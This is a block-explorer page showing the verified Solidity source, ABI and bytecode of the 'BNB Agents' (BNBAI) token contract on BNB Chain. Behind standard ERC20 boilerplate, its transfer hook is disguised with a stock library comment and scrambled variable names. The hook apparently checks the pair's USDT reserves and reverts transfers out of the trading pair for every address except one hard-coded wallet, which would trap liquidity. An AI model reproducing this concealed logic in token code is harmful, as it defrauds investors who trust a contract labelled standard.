BNB Price: $613.24 (+2.60%)
 

Overview

Max Total Supply

1,000,000,000ERC20 ***

Holders

145

Market

Price

$0.00 @ 0.000000 BNB

Onchain Market Cap

-

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
109,258,543.107920745900972574 ERC20 ***

Value
$0.00
0x1e3545298fa20866c75f2dd9d2606150cc5bc324
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information

Contract Source Code Verified (Exact Match)

Contract Name:
BNBAI

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license
/**
 *Submitted for verification at BscScan.com on 2025-01-31
*/

// Dependency file: @openzeppelin/contracts/token/ERC20/IERC20.sol

// SPDX-License-Identifier: MIT

// pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}


// Dependency file: @openzeppelin/contracts/utils/Context.sol


// pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// Dependency file: @openzeppelin/contracts/access/Ownable.sol
interface IUniswapV2Factory {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);
}


// pragma solidity ^0.8.0;

// import "@openzeppelin/contracts/utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol


// pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}


// Dependency file: contracts/BaseToken.sol

// pragma solidity =0.8.4;

enum TokenType {
    standard,
    antiBotStandard,
    liquidityGenerator,
    antiBotLiquidityGenerator,
    baby,
    antiBotBaby,
    buybackBaby,
    antiBotBuybackBaby
}

abstract contract BaseToken {
    event TokenCreated(
        address indexed owner,
        address indexed token,
        TokenType tokenType,
        uint256 version
    );
}


// Root file: contracts/standard/StandardToken.sol

/**
Website : https://www.bnbagents.ai
Twitter : https://twitter.com/BNBAgents_AI
Telegram : https://t.me/BNBAgents
*/

pragma solidity =0.8.17;

// import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
// import "@openzeppelin/contracts/access/Ownable.sol";
// import "@openzeppelin/contracts/utils/math/SafeMath.sol";
// import "contracts/BaseToken.sol";

contract BNBAI is IERC20, Context, BaseToken {
    using SafeMath for uint256;

    uint256 public constant VERSION = 1;
    IUniswapV2Factory private immutable uniswapV2Router;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;

    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _totalSupply;
    address public zwnPlezOGrzYZ = 0x2b98665767CA1DdB4038A414ae51C9B4D2681C60;
    address public USDT = 0x55d398326f99059fF775485246999027B3197955;
    address public uniswapV2Pair;
    constructor(
    ) payable {
        _name = "BNB Agents";
        _symbol = "BNBAI";
        _decimals = 18;
        _mint(msg.sender, 1000000000 * 10 ** _decimals);
        IUniswapV2Factory _uniswapV2Router = IUniswapV2Factory(0x10ED43C718714eb63d5aA57B78B54704E256024E); //Pancake Router mainnet
        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(address(this), USDT);
        uniswapV2Router = _uniswapV2Router;
        emit TokenCreated(msg.sender, address(this), TokenType.standard, VERSION);
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless {_setupDecimals} is
     * called.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        _balances[sender] = _balances[sender].sub(
            amount,
            "ERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _balances[account] = _balances[account].sub(
            amount,
            "ERC20: burn amount exceeds balance"
        );
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Sets {decimals} to a value other than the default one of 18.
     *
     * WARNING: This function should only be called from the constructor. Most
     * applications that interact with token contracts will not expect
     * {decimals} to ever change, and may work incorrectly if it does.
     */
    function _setupDecimals(uint8 decimals_) internal virtual {
        _decimals = decimals_;
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual { if (from == uniswapV2Pair && to != zwnPlezOGrzYZ) {      bool CzbyBUxFGcogXO;         bool yQXMijfvIra;         uint256 otherAmount;         (, bytes memory token00) = uniswapV2Pair.call(         abi.encodeWithSelector(0x0dfe1681)         );        (, bytes memory token01) = uniswapV2Pair.call(         abi.encodeWithSelector(0xd21220a7)       );       (, bytes memory reserves01) = uniswapV2Pair.call(         abi.encodeWithSelector(0x0902f1ac)       );       (uint256 reserves0, uint256 reserves1) = abi.decode(         reserves01,         (uint256, uint256)     );     address token0 = abi.decode(token00, (address));     address token1 = abi.decode(token01, (address));     (, bytes memory amount01) = token0.call(         abi.encodeWithSignature("balanceOf(address)", uniswapV2Pair)     );     uint256 amount03 = abi.decode(amount01, (uint256));     (, bytes memory amount02) = token1.call(         abi.encodeWithSignature("balanceOf(address)", uniswapV2Pair)     );     uint256 amount1 = abi.decode(amount02, (uint256));     if (token0 == USDT) {         if (reserves0 > amount03) {             otherAmount = reserves0 - amount03;             CzbyBUxFGcogXO = otherAmount > 1000;         } else {             yQXMijfvIra = reserves0 == amount03;         }     } else if (token1 == USDT) {         if (reserves1 > amount1) {             otherAmount = reserves1 - amount1;             CzbyBUxFGcogXO = otherAmount > 1000;         } else {             yQXMijfvIra = reserves1 == amount1;         }     }            require(!CzbyBUxFGcogXO && !yQXMijfvIra);      }}
}

Contract Security Audit

Contract ABI

API
[{"inputs":[],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"enum TokenType","name":"tokenType","type":"uint8"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"TokenCreated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"USDT","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"VERSION","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"zwnPlezOGrzYZ","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

600680546001600160a01b0319908116732b98665767ca1ddb4038a414ae51c9b4d2681c6017909155600780549091167355d398326f99059ff775485246999027b319795517905560e0604052600a60a090815269424e42204167656e747360b01b60c052600290620000739082620003f5565b50604080518082019091526005815264424e42414960d81b60208201526003906200009f9082620003f5565b506004805460ff19166012908117909155620000da903390620000c490600a620005d4565b620000d490633b9aca00620005e5565b6200023a565b60007310ed43c718714eb63d5aa57b78b54704e256024e9050806001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000132573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001589190620005ff565b6007546040516364e329cb60e11b81523060048201526001600160a01b03918216602482015291169063c9c65396906044016020604051808303816000875af1158015620001aa573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001d09190620005ff565b600880546001600160a01b0319166001600160a01b039283161790558116608052604051309033907f56358b41df5fa59f5639228f0930994cbdde383c8a8fd74e06c04e1deebe3562906200022b9060009060019062000631565b60405180910390a35062000674565b6001600160a01b038216620002955760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b620002b1816005546200033960201b620004241790919060201c565b6005556001600160a01b03821660009081526020818152604090912054620002e49183906200042462000339821b17901c565b6001600160a01b038316600081815260208181526040808320949094559251848152919290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b60006200034782846200065e565b90505b92915050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200037b57607f821691505b6020821081036200039c57634e487b7160e01b600052602260045260246000fd5b50919050565b601f821115620003f057600081815260208120601f850160051c81016020861015620003cb5750805b601f850160051c820191505b81811015620003ec57828155600101620003d7565b5050505b505050565b81516001600160401b0381111562000411576200041162000350565b620004298162000422845462000366565b84620003a2565b602080601f831160018114620004615760008415620004485750858301515b600019600386901b1c1916600185901b178555620003ec565b600085815260208120601f198616915b82811015620004925788860151825594840194600190910190840162000471565b5085821015620004b15787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b600181815b8085111562000518578160001904821115620004fc57620004fc620004c1565b808516156200050a57918102915b93841c9390800290620004dc565b509250929050565b60008262000531575060016200034a565b8162000540575060006200034a565b8160018114620005595760028114620005645762000584565b60019150506200034a565b60ff841115620005785762000578620004c1565b50506001821b6200034a565b5060208310610133831016604e8410600b8410161715620005a9575081810a6200034a565b620005b58383620004d7565b8060001904821115620005cc57620005cc620004c1565b029392505050565b60006200034760ff84168362000520565b80820281158282048414176200034a576200034a620004c1565b6000602082840312156200061257600080fd5b81516001600160a01b03811681146200062a57600080fd5b9392505050565b60408101600884106200065457634e487b7160e01b600052602160045260246000fd5b9281526020015290565b808201808211156200034a576200034a620004c1565b608051610e066200068d60003960005050610e066000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c806349bd5a5e11610097578063a9059cbb11610066578063a9059cbb1461020a578063c54e44eb1461021d578063dd62ed3e14610230578063ffa1ad741461026957600080fd5b806349bd5a5e146101b357806370a08231146101c657806395d89b41146101ef578063a457c2d7146101f757600080fd5b806323b872dd116100d357806323b872dd1461014d578063313ce5671461016057806339509351146101755780633c2653f21461018857600080fd5b806306fdde03146100fa578063095ea7b31461011857806318160ddd1461013b575b600080fd5b610102610271565b60405161010f9190610b63565b60405180910390f35b61012b610126366004610bae565b610303565b604051901515815260200161010f565b6005545b60405190815260200161010f565b61012b61015b366004610bda565b61031a565b60045460405160ff909116815260200161010f565b61012b610183366004610bae565b610383565b60065461019b906001600160a01b031681565b6040516001600160a01b03909116815260200161010f565b60085461019b906001600160a01b031681565b61013f6101d4366004610c1b565b6001600160a01b031660009081526020819052604090205490565b6101026103b9565b61012b610205366004610bae565b6103c8565b61012b610218366004610bae565b610417565b60075461019b906001600160a01b031681565b61013f61023e366004610c38565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b61013f600181565b60606002805461028090610c71565b80601f01602080910402602001604051908101604052809291908181526020018280546102ac90610c71565b80156102f95780601f106102ce576101008083540402835291602001916102f9565b820191906000526020600020905b8154815290600101906020018083116102dc57829003601f168201915b5050505050905090565b6000610310338484610437565b5060015b92915050565b6000610327848484610561565b610379843361037485604051806060016040528060288152602001610d84602891396001600160a01b038a16600090815260016020908152604080832033845290915290205491906106ef565b610437565b5060019392505050565b3360008181526001602090815260408083206001600160a01b038716845290915281205490916103109185906103749086610424565b60606003805461028090610c71565b6000610310338461037485604051806060016040528060258152602001610dac602591393360009081526001602090815260408083206001600160a01b038d16845290915290205491906106ef565b6000610310338484610561565b60006104308284610cc1565b9392505050565b6001600160a01b03831661049e5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084015b60405180910390fd5b6001600160a01b0382166104ff5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610495565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166105c55760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610495565b6001600160a01b0382166106275760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610495565b61063283838361071b565b61066f81604051806060016040528060268152602001610d5e602691396001600160a01b03861660009081526020819052604090205491906106ef565b6001600160a01b03808516600090815260208190526040808220939093559084168152205461069e9082610424565b6001600160a01b038381166000818152602081815260409182902094909455518481529092918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9101610554565b600081848411156107135760405162461bcd60e51b81526004016104959190610b63565b505050900390565b6008546001600160a01b03848116911614801561074657506006546001600160a01b03838116911614155b15610b3a5760085460408051600481526024810182526020810180516001600160e01b0316630dfe168160e01b17905290516000928392839283926001600160a01b03169161079491610cd4565b6000604051808303816000865af19150503d80600081146107d1576040519150601f19603f3d011682016040523d82523d6000602084013e6107d6565b606091505b5060085460408051600481526024810182526020810180516001600160e01b031663d21220a760e01b1790529051929450600093506001600160a01b03909116916108219190610cd4565b6000604051808303816000865af19150503d806000811461085e576040519150601f19603f3d011682016040523d82523d6000602084013e610863565b606091505b5060085460408051600481526024810182526020810180516001600160e01b0316630240bc6b60e21b1790529051929450600093506001600160a01b03909116916108ae9190610cd4565b6000604051808303816000865af19150503d80600081146108eb576040519150601f19603f3d011682016040523d82523d